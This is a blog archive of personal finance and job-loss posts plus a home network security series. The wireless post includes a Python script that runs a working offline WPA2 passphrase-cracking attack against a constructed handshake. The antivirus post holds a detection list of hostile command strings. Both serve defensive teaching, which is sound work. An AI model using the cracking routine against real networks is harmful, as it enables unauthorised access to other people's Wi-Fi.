Category Archives: Work

Investing without a tax-deferred account

My new job does not have a tax-deferred account option – other than an HSA.  I don’t believe we can even *have* an HSA until the end of the year.  We’re using Dad’s Health Care FSA (although, we can drop it when we update his coverages because our health insurance has changed – “qualifying event”).  The new company contributes $1500/year to an HSA (high deductible plan – hope I can use Dad’s high deductible plan, and their HSA – since I hopefully won’t be there long).  We may be able to contribute $6,550 to the HSA for the year (which I’m going to see if I can make happen almost all at once if we can contribute – might as well get in on the fun while I can).

I *was* going to max my 401(k) contributions starting in August, but well, that plan is shot at the moment.  So, the best I can do is the HSA (if I can contribute), and try to get a deduction for a traditional IRA contribution – not sure if I can because I was covered under a plan for part of the year.  And then sock away a lot into a taxable account.  I *think* we’ll be able to contribute to a Roth, but our taxes will be *super* high this year without me being able to shelter some (at least 6k extra), so it probably doesn’t make sense.

I am getting ~$8,800 in accrued paid time off – no idea when that’s coming through or in what form (will taxes be taken out of it? will it be as part of payroll from the new company?).  It will be a nice pad to our emergency fund – which I had just almost drained to pay off my loans (talk about bad timing).

We’re moving into “save a lot” mode where we’re going to try to save 90% of my net salary, or about 35% of our total gross (we still have to pay daycare if I work, so we can’t do 100% of mine).  That extra money will be invested in a taxable account.  I’ve so far only been investing in ETFs in my taxable account – in about a month, I should have enough to switch those over to mutual funds.

We’re going to use Dad’s health insurance, because it’s too annoying to switch again, and at the moment, his job is more stable.  I’m hoping to find a new position in the next month.  I already had to cancel my annual exam (originally scheduled for 6/2 and way overdue – should have been in April) because I had no clue what my insurance status would be. I just need to get the paperwork from our HR that says I was “laid off” to give to Dad’s company to start under their plan next week.  From what I can tell, their prices are about the same as Dad’s.

Does anyone else have to deal without tax-deferred savings?  I’m already looking for another job, but aside from that, how do you deal with investing for retirement?

Accepted the Offer

I verbally accepted the offer with one condition – they have to have some kind of tax-deferred retirement account available by the end of the year.  I ran some numbers, and if we can’t sock away my contribution tax-deferred, we’ll owe about $6000 more in taxes per year (and without being able to lower my taxable income, I can’t deduct any amount contributed to an IRA because Dad has a 403(b)).  Those extra taxes combined with the piss poor salary offer and benefits basically causes me to lose almost 30k/year in compensation – from what I’m making now – which is well below what I should be making.

I haven’t signed any paperwork, so I have no idea if I technically have a job on Monday. I’m at home today (taking as much of my personal leave as I can before it disappears – except I’ve pretty much spent all day dealing with this crap…)

I will however be actively looking for another position which pays better/has better benefits.  Won’t hurt to have *some* money coming in while I look….  And if your company is looking for a CISO or CISO type position, let me know via e-mail (mom at mydomain) 🙂

Update 30-May 5:30pm: my boss is making up the PTO issue – we’ll be paid out what PTO we had accrued – I had 5 weeks, so I’m getting a bit more than a month’s extra money out of it – a nice start to our long term emergency fund.

And the Hammer Falls…

Well, it looks like as of Monday, I might well be out of a job.  I *think* I qualify for unemployment since technically the company is closing and I’m being “laid off”.  I’ve been offered employment from the company that is “buying” my company, but it doesn’t look very attractive (no retirement plan at all!).   I need to talk to someone who is familiar with unemployment law to check on that (murky details, so I’m not sure that it’s cut and dried).

I’ve not met the people I’d be working for – although I’d directly be working for my current boss.  According to him, other than pay, benefits, etc, the work we do won’t change, the clients won’t really change, etc.  I’m leaning towards giving it a try – maybe.  I’m meeting with the “new” owners this afternoon.  There is a serious non-compete (“Company loyalty”) clause where I can’t hold down any other work while working for them, and anything I come up with while working for them (even on my own time) belongs to them – puts a serious dent in Dad’s and my plan to write our own software.  I don’t know how negotiable it is – I can declare previous invention, and since we’ve had this idea percolating in the backs of our minds for a while, I can declare it.  I *think* I have to declare this blog, although I make no money off of it (haven’t in over a year), it might turn into something though – and it is prior invention.

Because I’ve been working so hard the last three weeks, my brain is a bit fried – I lean towards giving them the finger and hoping we can make it (I need to make my decision by tomorrow, no idea what time tomorrow though).  I need to run some numbers to see if we really can do it, and where we can cut back.  I know we can do it if we take Daughter Person out of daycare, but I mentally can’t handle that, so we’d probably do a day or two a week at least – or maybe talk Grammy into staying for a while.

At least I don’t have student loans to worry about!  And thanks to YNAB, we have June fully covered as far as income.

Busy, Busy, Busy

Work has picked up this month, and I’m traveling during 3 weeks this month – including to Brazil at the end of the month.  The traveling is fun to a certain extent, but in addition to the actual travel to the sites I’m visiting, I have to spend approximately 40 hours writing a report once I’ve finished my site visit.  If you do the math, you’ll notice that there are not more than 40 hours in a work week – leaving me finishing my reports after hours.   I’m particularly keen on finishing the reports before I do the next site visit, just so I don’t get multiple sites mixed up in my head!

The travel normally isn’t too bad, but this past week, I got caught up in the delays caused by a fire at air traffic control in Chicago.  My flight (nowhere near Chicago) was delayed over 4 hours!  At least we managed to get to our destination, which is more than I can say for some other travelers that day.  I actually was so exhausted when I finally made it to my hotel that I ordered room service.  I think I can count on one hand how many times I’ve ordered room service.  I can expense it, but I still have a deep-seated desire to not waste money, even if it’s not mine. (I’ve actually got a bit of a reputation at my client for being the “cheap one”).

I hope to catch up on everyone’s posts as I procrastinate report writing, but I do want to spend some time with my family while I’m not traveling!

If/Then in New York City

I just spent the last few days in New York City for work, and I took advantage of the trip to see a Broadway show. I’m a huge fan of Idina Menzel, and so I looked up tickets for “If/Then”, her new musical. Dad graciously used his fun money to buy my ticket because I wasn’t going to spend “that much” money on one ticket ($101.25). Go see it if you get the chance, but take tissues!

The show is all about the choices we make and what those consequences can be, and the missed opportunities we’d have or not have based on those choices. The show starts with Elizabeth (Idina Menzel) making a choice in a park in New York City. Then the rest of the show follows the two paths that “happened” after that first choice. You follow the two paths “Liz” and “Beth” through the show, including work, love, heartbreak and friendship. I admit I bawled during the 2nd half after intermission. The central theme of the show is all about making our choices and owning them, and not constantly wondering what if.

The central theme applies to our lives as well. We made choices to get to where we are today, whether we’re happy about that or not. And we can’t keep wondering what if we had made a different choice. We have to own our choices, good and bad, and live with them. Once those choices are made, we can’t undo them, and we shouldn’t even try, but instead make our next choice to the best of our ability.

When it comes to our financial lives, most of us probably wish we made different choices in the past – living more within our means, saving more, borrowing less. But we are where we are now, and the best we can do is make the best choices we can from this moment on. So, if you borrowed money in the past – even just moments ago – start making the choices you want to make right now.

No one knows what the future holds (or we’d all be lottery winners!), so you do what you think is best at the time given what you *do* know. Don’t waste time wondering what would have happened if you had made a different choice, you didn’t – so own your choice, and make a better choice next time.

Home Network Security Part 5 – Outsourcing

Many folks reading this “outsource” some of their computing power or storage to 3rd parties.  If you pay for hosting, or back up to an online backup service, you’re “outsourcing”.  You’re also trusting this third party to take care of your data.  Have you looked at the security policies or audits of the companies you are working with?  It’s not easy, and at some point, you just have to pick a company to work with and hope they’re doing things “right”.

What Can You Do?

Most data centers, and some hosting companies, go through a third-party attestation audit; in the US these are the SOC reports (the SSAE 16 standard replaced the older SAS 70 in 2011).  There are three kinds of SOC report, and the technical security information is in the SOC 2.  SOC 1 covers controls relevant to financial reporting, and SOC 3 is too generic to be of much use (and many companies don’t bother): it’s essentially a public statement that they have been audited.  Each report also comes in two types: a Type I report describes the controls at a point in time, while a Type II report tests whether they actually operated over a period (usually 6 to 12 months), so a SOC 2 Type II is the one you want.  Getting your hands on one is almost impossible though: you’ll likely have to sign an NDA to read it, and even if you do, you might not understand it.  It’s a list of the controls the company has to protect the security, availability, processing integrity, confidentiality and privacy of the data they hold, together with the auditors’ tests of whether those controls are adequate and operational (aka, working like they’re meant to).

If you can find out that a company has a SOC 2 Type II, the fact alone is a reasonable indicator that they’ve got their ducks in a row from a security perspective.  After all, why pay for the audit (a significant expense) and not reasonably expect to pass?  Also, the SOC 2 is meant to be shared with customer auditors, and no company would want to share one with a long list of exceptions.  The caveat is that the company decides which systems and which of the five criteria are in scope, so check that the service you actually use is covered by the report.

Companies (often non-US ones) can also be certified against ISO 27001, the international information security management standard.  I personally think an ISO 27001 certificate is a better indicator of security than a SOC 2 because ISO 27001 starts from a defined catalogue of controls (Annex A) and the company has to justify, in its Statement of Applicability, any control it leaves out, whereas a SOC 2 describes whatever controls the company chose to put in place.  Either way, ask for the certificate’s scope: a certificate can cover a single data center or business unit rather than the whole company.

Review Security Policies

Many companies make a generic version of their security policies available on their web page (or perhaps with an NDA).  Take a look at it and consider how reasonable it is, or compare it to what you do at home (or work).  Just having a security policy isn’t sufficient – make sure it covers the topics you’re concerned about.

How to Interpret What You Find

Does the company encrypt your data?  Who holds the encryption keys, you or them?  If the provider holds the keys, the provider (and anyone who compromises or compels the provider) can read your data; if only you hold them, and the data is encrypted before it leaves your machine, a subpoena to the provider yields nothing but ciphertext.  Are you worried about your data being read, or about it being handed to a government in response to a subpoena?  Decide what you are actually worried about, then look for what the company says about it on their web page.  It also never hurts to e-mail them and ask; try the general sales e-mail first, they can usually answer or route your questions.

Popular Companies’ Security Information

Are there any other companies you use that you need help finding their security information?  I can help in a limited capacity via the comments (ie. pass on what’s publicly available).  If you’re really concerned about outsourcing and want more in-depth security information on your outsourcing company, contact me via e-mail mom at <my domain> and I can tell you about what my company does and how we might be able to help you


Home Network Security Part 4 – Wireless Networks

Wireless networks are great things – you can take your laptop pretty much anywhere in or around your house and still be connected to the Internet with no wires.  I remember when they were first beginning and a wireless card for your laptop cost almost $300, not to mention the cost of a wireless router.  CMU was one of the first schools to have a completely “wired” wireless campus – that meant that pretty much anywhere you were on campus, you could reach a wireless access point.  Wireless Andrew was my first experience with wireless networking, although I had heard of it previously.  And students could get a subsidized PCMCIA card for about $150.

Now, wireless networks are *everywhere*, and a lot cheaper.  Most cable modems or FIOS routers come with wireless enabled – and it’s a lot faster than it was.  When we first moved to our house, it took Verizon almost 3 weeks to get our FIOS installed (they had to increase the capacity at our neighborhood’s main connection point before they could connect us), but “helpful” neighbors had wide open access points, so we could still get on-line from home.  I’m not sure they ever knew we “borrowed” their connection for a while.

So what does this have to do with security?  A wireless access point that is incorrectly configured can be a legal headache for you, an entry point into your network, and just plain annoying.  As the subscriber, YOU are the one associated with all Internet traffic that goes through your cable modem/FIOS router/phone line/whatever.  So, if someone downloads or uploads a pirated movie using your network, you are the one who gets the cease and desist letter or court summons.  You can fight it, but you still have to fight it in the first place.  If you don’t limit access to your wireless access point (router), someone sitting on the street can cause you a lot of headaches.

What is a correctly configured router?  One where you have a reasonable idea of who is connecting to your network and what they have access to, i.e. it limits access to authorized users.  Most corporations do this by requiring a corporate account or a per-user guest username/password (not a shared network password) to get onto the wireless network.  If you’ve been in a hotel where you have to type your room number and last name into a web page before you get Internet access, that’s what I’m talking about.  Most home routers do not have this capability; if yours does, look into using it.  One thing that looks like a good idea is MAC address filtering.  It’s not a bad idea, but it won’t stop anyone determined: MAC addresses are sent in the clear in every frame, so an attacker can watch for an allowed device and copy its address with a single command.  Don’t depend on it as your only mechanism.

The best method available to home users is WPA2 with AES (CCMP) encryption and a strong network key.  If you have older equipment (Nintendo DS…) that doesn’t support WPA2, use WPA if you can, and WEP only as a very last resort.  WEP is broken by design: an attacker can recover the key in minutes no matter how long it is, and can generate the traffic they need themselves rather than waiting for you to produce it.  WPA (TKIP) has its own weaknesses and is also deprecated.  WPA2 is not magically unbreakable either: in home (pre-shared key) mode, with either WPA or WPA2, an attacker who records the handshake when a device joins (and who can force a device to rejoin by kicking it off the network) can take that recording home and guess passphrases against it offline, as fast as their hardware allows.  The only thing that defeats that attack is a long, random passphrase.  Once an attacker has the network key, they can keep coming back to use your network for free.
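The offline attack described above, as an added example that is not part of the original post: it performs the WPA2-PSK key derivation a real client does (PBKDF2 of the passphrase salted with the SSID, then the pairwise key expansion and the handshake MIC), uses that to produce the MIC a sniffer would have recorded, and then guesses passphrases against the recording without ever touching the network again.  The SSID, MAC addresses, nonces, frame body and word list are all constructed for the example.

```python
import hashlib
import hmac

# Constructed sample network. None of this comes from a real capture: the
# "captured" MIC is produced by running the same derivation a real client and
# access point perform, so the attack code can be exercised offline.
SSID = b"HomeNet"
AP_MAC = bytes.fromhex("00112233aabb")
CLIENT_MAC = bytes.fromhex("66778899ccdd")
ANONCE = hashlib.sha256(b"constructed-anonce").digest()  # 32-byte AP nonce
SNONCE = hashlib.sha256(b"constructed-snonce").digest()  # 32-byte client nonce
# Stand-in for EAPOL-Key message 2 with its 16-byte MIC field zeroed. A real
# frame carries key info, replay counter, SNonce and the RSN IE; the exact
# layout does not matter here, only that attacker and client MIC the same bytes.
EAPOL_MSG2_ZERO_MIC = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 8 + SNONCE + b"\x00" * 74

# Constructed word list; a real attacker uses millions of entries.
WORDLIST = ["password", "letmein", "homenet2013", "password123", "qwerty"]


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """802.11i pairwise master key: PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: expand the PMK with both MAC addresses and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(5)
    ]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2/CCMP key-descriptor MIC: HMAC-SHA1 under the KCK (first 16 bytes of the PTK), truncated."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def client_handshake_mic(passphrase: str) -> bytes:
    """What a legitimate client puts in message 2, and therefore what a sniffer records."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MSG2_ZERO_MIC)


def crack_psk(captured_mic: bytes, wordlist):
    """Offline dictionary attack: every guess is checked against the recording alone."""
    for guess in wordlist:
        if hmac.compare_digest(client_handshake_mic(guess), captured_mic):
            return guess
    return None


if __name__ == "__main__":
    import time
    for passphrase in ("password123", "k7$Vq2!pLw9#zR4m"):
        captured = client_handshake_mic(passphrase)
        t0 = time.perf_counter()
        found = crack_psk(captured, WORDLIST)
        print(f"{passphrase!r}: recovered={found!r} after {len(WORDLIST)} guesses "
              f"in {time.perf_counter() - t0:.2f}s")
```

Each guess costs 4096 iterations of PBKDF2, which is what keeps a random 16-character passphrase out of reach while a word from a list falls in seconds.  Two details worth noticing: the SSID is the salt, so precomputed tables exist for common default names (rename the network), and nothing in the loop talks to the access point, so no log on the router will ever show the attempt.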

If your router supports WPS (Wi-Fi Protected Setup), it’s a convenient feature, but the PIN method has a design flaw: the 8-digit PIN is checked in two halves, so an attacker only has about 11,000 possibilities to try instead of 100 million, and can brute-force it in hours to learn your WPA2 passphrase, however strong it is.  Once you’ve set up your laptop/desktop, turn WPS off.

In addition to possibly opening you up to legal problems, someone able to access your wireless network can access systems on your home network, potentially compromising your confidentiality and integrity.  They can also affect your availability by using up all of your bandwidth.

For home users, this suggestion is not completely practical, but it should definitely be implemented for small businesses: separate your wireless network from your wired or corporate network with a firewall.  That means that folks on your wireless network (whether allowed or not) can only reach the Internet, and authorized users use whatever your company’s remote access method is (a VPN) to reach the internal network from wireless.  Home networks can do this as well, but you’ll need some kind of remote access solution, like OpenVPN or LogMeIn.  Many newer home routers offer a “guest network” option that gives visitors Internet access while isolating them from your own devices, which is a cheap way to get most of the benefit.


Home Network Security Part 3 – Updates

You should always be automatically (or ASAP) updating all of the software on your system.  The operating system, your office suite, chat programs, your web browser.  If there’s an update for it, you should probably be applying it.  I’m not saying you necessarily need to upgrade your software, but you do need to keep it updated.

An update is a patch the vendor releases for the version you already have, to fix something; an upgrade moves you to a newer version.  A patch may fix one little thing, or a whole bunch of things, and some add features as well; it’s completely dependent on the vendor.

Security updates fix a known vulnerability, often one with a public exploit.  Many times, in the description of the update you’ll see something like “fixes CVE-2013-3940” with a link to the vulnerability.  CVE (Common Vulnerabilities and Exposures) is the catalog of vulnerability identifiers maintained by MITRE; NIST’s National Vulnerability Database (NVD) takes every CVE entry and adds details, including a CVSS severity score from 0 to 10.  If you’re feeling technical, you can go read what the issue is, but even the score alone tells you how urgent the update is: the higher the number, the faster you should apply it!  Keep in mind that the score rates the vulnerability in general, not your situation; a 7.0 in a service you never expose to the network is less urgent than a 6.5 in your web browser.

If you do not apply the updates, your system is now vulnerable to a known attack, and many attacks have a corresponding exploit or Proof of Concept (PoC) code that is semi-public, so you can be sure that someone will be trying it out on random or targeted computers.  Just because you haven’t updated doesn’t mean that you will be attacked or that you will be compromised.  You have other protections in place to limit access to your system: like a firewall, or anti-virus.  It’s like playing Russian roulette with an old bulletproof vest.  Two things have to happen: you have to be attacked (the bullet in the correct chamber), and you have to be vulnerable (the vest might not work any more – or you might get hit outside the area protected by the vest).


For larger vendors (Microsoft), there is a distinction between a security update and a general update.  You should allow all security updates automatically.  Vendors have gotten really good at segregating the security fixes from new features, and so automatically updating security patches is not likely to affect you adversely.  General updates fix non-security issues or add new features.  For the most part, you’re not going to get any grief from automatically updating these, but from a security standpoint, you don’t need to automatically update the general updates.


Software manufacturers/developers stop supporting software at some point: the End of Life (EOL).  After that, no more patches are released, even if a serious vulnerability is found.  If you’re still running Windows XP or Office 2003, you need to upgrade because Microsoft is ending support for both on April 8, 2014.  And if you’re frugal, you might be running those old versions to save money; I know I’ve still got XP in my Windows VM.  Microsoft has a pretty long lifecycle for their products, over 10 years, but other developers don’t (Adobe’s is 5 years).  Some don’t even bother to tell you they’re no longer supporting a particular version.

What If I Don’t Want to Upgrade?

If you don’t want to or can’t upgrade to a supported version for some reason, make sure you have a firewall that blocks all unsolicited inbound traffic, the most up-to-date anti-virus you can get, an up-to-date browser, and preferably a sandboxing tool like Google Chrome’s built-in sandbox or Sandboxie.  You will still be vulnerable to whatever never gets patched, but the firewall will protect you from network attacks, and anti-virus and sandboxing help protect from “user error” attacks, i.e. clicking on an e-mail attachment.  Also remember that browsers and plugins eventually drop support for old operating systems too, so the time this buys you is limited.

Additionally, if there’s no reason for this machine to be on your network (ex: it’s for CAD, or an off-line video game), consider just unplugging the network cable or disabling wireless.


Home Network Security Part 2 – Anti-Virus

Your systems should have anti-virus software installed – yes, even those of you with Macs. If you run Linux as a desktop, you get a pass, but I still recommend installing ClamAV or Sophos if you exchange files with Windows systems. You don’t want to unintentionally pass along a virus to your friends and family.

Sidenote: If you browse porn or other “questionable” sites, I’m not going to judge, but you need to be even more careful about having a good, up-to-date anti-virus program.  Don’t install two or three real-time scanners on the same machine though: they fight over the same files and can make the system unstable, and one product with on-access scanning is enough.  And you should really consider sandboxing that activity; I use VMware and snapshots when I need to visit questionable sites, and roll the VM back afterwards.

There are many anti-virus products available, and for the most part, they’re all good options. You want to look for a product that advertises “heuristics” – and almost all of them do. If you have more than 4-5 computers in your household (and a system you can install the centralized server on), you may want to consider splurging for the “endpoint protection” solutions which allow you to control the anti-virus software (and software firewall) from a centralized server – great for kids. But it’s not necessary at all.

One of my current favorites for Windows is Microsoft Security Essentials.  It’s free, rates very highly in the tests that are run by 3rd parties, and doesn’t completely bog down your system.

I use Sophos for Mac, (free) but I’ve also heard good things about Kaspersky (it’s also a firewall) and ESET, but I’ve not used either of them.

The most common vector of attack is malware: viruses, trojans, key loggers, etc.  All an attacker has to do is get you to open a web page or an e-mail attachment and they can infect your computer, and you’re left cleaning up the mess.  The specific actions of the malware vary, but it can make your system part of a botnet, encrypt all of your important files, or give an attacker control of your system to read your files, send e-mail as you, etc.

Malware hits your confidentiality, integrity and availability, depending on the specific action, so it’s important to try to prevent it.

How to configure Anti-Virus

For the most part, the defaults for any anti-virus install are acceptable.  You want at a minimum:

  • Automatic signature updates
  • Heuristic detection enabled
  • On-access/on-read scanning

You also should consider the following settings, but there can be some drawbacks to them:

  • Automatic engine updates (not too many drawbacks, but does update the software automatically, some don’t want that)
  • On-write scanning (can slow down writes and disk performance)
  • Scanning networked drives (you may not want your system to be scanning a file server)
  • Scheduled scanning (a full scan of your system on a schedule.  This works better on a desktop, and while the scan is going on, it will generally bog down your system)

What if you do get infected?

If you do happen to be infected by malware, there are several things you can do.  One, get yourself a free anti-virus ASAP, run it, and it *may* be able to clean up your system.  Better still, scan from a bootable rescue disc (most vendors offer one) so the malware isn’t running while you scan.  If it can’t clean the infection, it can at least tell you which file was infected; then you need to rebuild your system and restore from backup, without that file, and change the passwords you used on that machine.  There are also IT shops which specialize in removing malware, and you can look into them, but it’s a long process and they likely charge more than you’re willing to pay; it is an option though.

How Anti-Virus Works (optional)

There are two methods of protecting a system from viruses and malware: signatures and heuristics.  In the past, signatures were the only method available, but in the last 4-5 years heuristics have become a significant research area and an important protection.

Signatures are patterns (a file hash, a byte sequence, a string, a particular change to a system file) that identify a specific piece of malware.  For all known malware, your anti-virus should have a signature, although it may be a day or two from discovery to a signature update, and a trivial change to the malware (repacking it, flipping a byte) produces a file that an exact-match signature no longer recognizes.  That’s great for known malware, but what about the new stuff that’s coming out almost every day?

This is where heuristics come in.  Your system operates in a certain way: “normal”.  Malware tends to do things outside of that normal: replicate itself, change system files, make unexpected network connections, hide its code by packing or encrypting it.  Anti-virus programs look for this type of behavior and take steps to quarantine the code.  Some of it is static (scoring a file on suspicious properties before it runs, such as high-entropy packed sections or strings that reference dangerous system functions), and some is dynamic: running the code in a special “sandbox” where it can’t touch your “real” system and watching its system calls.  If it’s all clear, the anti-virus lets it run on your system and “remembers” that it’s clean so it isn’t sandboxed next time.  Other heuristics watch for abnormal network traffic or disk usage; the specifics depend on the product you bought and how they conduct their research.  Heuristics aren’t perfect, and they produce false positives, but they’re considered “good enough” to help detect new malware that your software doesn’t have the signature for yet.
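The two detection methods side by side, as an added example (not the post’s own code and not any real engine): a scanner with an exact-hash signature, a byte-pattern signature, and two static heuristics (byte entropy and suspicious strings), run over constructed sample files.  The EICAR test string is the one real item; every signature, threshold and sample file is constructed for the example, and real products weigh far more indicators than these.

```python
import hashlib
import math
import re

# The EICAR test string: a harmless file that every real scanner detects.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Constructed signature database: exact hashes of known samples, plus byte
# patterns that survive small edits to the file.
HASH_SIGNATURES = {hashlib.sha256(EICAR).hexdigest(): "EICAR-Test-File"}
PATTERN_SIGNATURES = [(re.compile(rb"EICAR-STANDARD-ANTIVIRUS-TEST-FILE"), "EICAR-Test-File.variant")]

# Constructed heuristic indicators, loosely modelled on what real engines weigh.
SUSPICIOUS_STRINGS = [b"CreateRemoteThread", b"URLDownloadToFile", b"powershell -enc", b"cmd.exe /c"]
ENTROPY_THRESHOLD = 7.2       # bits per byte: text is ~4-5, packed/encrypted code ~7.5-8
MIN_SIZE_FOR_ENTROPY = 512    # entropy of tiny files is meaningless
SUSPICIOUS_SCORE = 2          # points needed before we call something suspicious


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 means every byte value is equally common."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def scan(data: bytes) -> dict:
    """Signatures first (a hit is definitive), then heuristics (a score)."""
    reasons = []
    name = HASH_SIGNATURES.get(hashlib.sha256(data).hexdigest())
    if name:
        reasons.append(f"hash signature: {name}")
    for pattern, pname in PATTERN_SIGNATURES:
        if pattern.search(data):
            reasons.append(f"pattern signature: {pname}")
    if reasons:
        return {"verdict": "malicious", "reasons": reasons}

    score = 0
    if len(data) >= MIN_SIZE_FOR_ENTROPY:
        ent = shannon_entropy(data)
        if ent > ENTROPY_THRESHOLD:
            score += 2
            reasons.append(f"high entropy ({ent:.2f} bits/byte): packed or encrypted payload?")
    hits = [s for s in SUSPICIOUS_STRINGS if s in data]
    if hits:
        score += len(hits)
        reasons.append("suspicious API/command strings: " + ", ".join(h.decode() for h in hits))
    return {"verdict": "suspicious" if score >= SUSPICIOUS_SCORE else "clean", "reasons": reasons}


def pseudo_random_blob(seed: bytes, size: int) -> bytes:
    """Deterministic high-entropy bytes, standing in for a packed executable section."""
    out, block = b"", seed
    while len(out) < size:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:size]


# Constructed sample "files".
SAMPLES = {
    "eicar.com": EICAR,
    "eicar-mutated.com": b"Y" + EICAR[1:],             # one byte changed: hash misses, pattern still hits
    "packed.bin": pseudo_random_blob(b"seed", 2048),    # no signature at all; only heuristics catch it
    "dropper.cmd": b"echo hi\r\npowershell -enc AAAA\r\ncmd.exe /c del *.bak\r\n",
    "readme.txt": b"Meeting notes: bring the quarterly numbers.\n" * 20,
}

if __name__ == "__main__":
    for fname, data in SAMPLES.items():
        result = scan(data)
        print(f"{fname:18} {result['verdict']:10} {'; '.join(result['reasons']) or '-'}")
```

The mutated sample is the point: flipping one byte defeats the hash, the substring signature still catches it, and a sample with no signature at all is flagged only because its bytes look packed.  That last verdict is also where false positives come from (a compressed archive or an encrypted backup has the same entropy), which is why heuristic hits are scored and reviewed rather than deleted on sight.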


Home Network Security Part 1 – Firewalls

You need a firewall.  Yes, even you with only one computer at home. Yes, even you that works from a laptop at a coffee shop (especially you).

You don’t necessarily need a hardware firewall, which is what most people think of when I say “firewall”.  A software firewall is sufficient, and sometimes the best option.

There are several types of firewalls, the two I’m going to break down here are hardware and software.  You *always* want a firewall that claims SPI – Stateful Packet Inspection, or you’re going to have a lovely time figuring out which ports to open and close – luckily, all the newer ones I know of are stateful.

Firewalls prevent network connections from attackers, so they’re stopped “at the door” so to speak.  There are ways around firewalls, but a firewall will protect you from many of the random attacks that are continuously going on on the Internet.  They are one of the most basic, most available, and easiest to implement security protections you can have.

Hardware Firewalls

If you have more than one computer at home, a hardware firewall is ideal: one device protects most of your systems.  If you have cable or FIOS high speed Internet access, you probably already have one (and it’s likely enabled) as part of your cable modem or FIOS router, and if you have a wireless router, there’s a good chance you’ve got a hardware firewall.  If you don’t have one, or aren’t sure, the Cisco/Linksys WRT54G* series of home routers is pretty decent, and the ones I’ve had in the past have been solid; that doesn’t mean the current crop is as good, every manufacturer has had their issues.  Other brands to check out are D-Link and Netgear.  I’m not a big fan of D-Link, and a backdoor has been reported in some of their models (not confirmed as I write this), but they’re cheap.  Pretty much any “router” you buy should claim to have an “SPI” firewall, and you’re good to go; pick whichever manufacturer and “other” features you like.  Whatever you buy, change the admin password from the default and check the vendor’s site for firmware updates now and then, because a router with a known hole in its admin interface isn’t much of a firewall.

These “home” firewalls are not as powerful or configurable as an enterprise/business firewall, but they’re “good enough” for home users.  One of the biggest differences between a home firewall and an enterprise firewall is the lack of an Intrusion Detection System (IDS).  This isn’t a huge deal for home users, but if you want an IDS on your firewall, most providers sell small business firewalls that have that capability (although none of them have good ratings on Amazon).  You can also put your own IDS on your network.  Snort is (was?) the best free one, but the company supporting it was just acquired by Cisco, and no one knows how well that will go over yet.

Hardware firewalls build a virtual “wall” around your network to help prevent attacks.  Given the number of casual attacks that go across networks every day, a hardware firewall can also lighten the CPU/memory load on the systems inside that wall.

Even if you have a hardware firewall, you want to have a software firewall enabled for all of your “portable” devices – laptops that will leave your network, etc.

Software Firewalls

Windows and Macs have come with built-in software firewalls for several years.  It must be enabled on a laptop or any machine that travels outside your network; on a desktop that never leaves home it’s an added bonus, but not required.  On Windows, go to Control Panel, then System and Security, then Windows Firewall, and make sure it’s turned on for every network profile (home/private as well as public).  On a Mac, go to System Preferences, Security & Privacy, and under the Firewall tab make sure it’s turned on.

Almost all anti-virus software also offers a “personal firewall” as well, so you can opt for one of those.  They tend to work on the ports and protocols method, and some people prefer that.

Software firewalls only protect the one computer that it is enabled on, and there are actually *many* holes in software firewalls by default to support operating system services (network drive sharing, etc).  It’s a balance between usability and security, and the vendors tend towards usability in home systems.

Where hardware firewalls almost always work on the concepts of “ports and protocols”, software firewalls generally work at the application level – allowing specific processes or applications access, and blocking others.

Firewall Settings

Log into your firewall/router via the web page and pay attention to what your firewall settings say – print the screen, write them down, etc. Become familiar with them, find a manual for your router/firewall and twiddle with settings (and know how to hard reset the device!).

Most home users are going to want to completely block all incoming traffic at a hardware firewall and some software firewalls.  But won’t it keep things from working?  It shouldn’t.  This is where the Stateful Packet Inspection part comes in.  Something inside the wall initiates a connection to the outside.  The firewall allows back in all related traffic – responses from web pages, game servers, Netflix, etc.

There are some things home users use which require ports/protocols to be open from the outside.  All home routers have NAT (Network Address Translation) enabled; because the devices behind it have no public address of their own, unsolicited inbound traffic has nowhere to go, which makes NAT a firewall of sorts by itself, but not a sufficient one.  You’ll find settings for port forwarding if you need to open any ports/protocols in your firewall.  Common situations that may require open ports: VoIP service (although most providers have fixed this routing issue), remote access software (like Hamachi, or your own VPN), and provider management access, where your cable or phone company can reach into your router or phone adapter remotely.  Personally, I close off access to anyone but me, but then you’re taking the chance that your cable/phone company may not be able to help you remotely if you have problems.  Generally, I suggest closing everything off, then testing the various items: call your VoIP number from your cell.  Does the call go through?  If not, you may need to open specific ports.

If you’re comfortable with networking concepts, I suggest blocking outgoing ports you know aren’t used as well (egress filtering).  This helps keep your network from being used to attack others (a compromised machine sending spam directly on TCP port 25, for example), and helps against what I call “callback” attacks, where malware on a compromised machine connects back out to the attacker over whatever port is open, which on almost every firewall is all of them, since outbound connections are allowed by default.  This steps over the security vs. usability line, so take this advice with caution, and check the firewall’s log for what you broke.

With a software firewall, I also suggest blocking all incoming traffic, but on Windows a lot of services (file and printer sharing, remote assistance, etc.) are allowed through by default, so review the list of allowed programs.  Microsoft has a decent write-up of the settings options for Windows Firewall, and Apple has a corresponding document for Macs (yes, it applies to Lion, Mountain Lion and Mavericks).  One setting I would caution you *not* to apply on the Mac firewall is logging: it will completely bog down your system, and if you’re not going to look at the logs, why turn them on?

How Firewalls Work (optional reading)

